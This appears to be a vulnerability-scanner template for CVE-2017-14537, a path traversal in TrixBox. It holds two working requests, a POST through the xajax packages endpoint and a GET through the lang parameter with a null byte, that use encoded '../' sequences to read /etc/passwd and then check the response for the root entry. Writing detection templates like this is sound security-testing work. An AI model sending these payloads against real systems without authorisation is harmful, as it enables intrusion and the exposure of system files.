id: CVE-2017-14537 info: name: TrixBox Path Traversal risk: Medium params: - root: '{{.BaseURL}}' variables: - endpoint: | maint/ requests: - method: POST url: >- {{.root}}/{{.endpoint}}index.php?packages headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 data: xajax=menu&xajaxr=1504969293893&xajaxargs[]=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&xajaxargs[]=yumPackages detections: - >- StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:") - method: GET url: >- {{.root}}/{{.endpoint}}modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 detections: - >- StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:") references: - https://www.cvebase.com/cve/2017/14537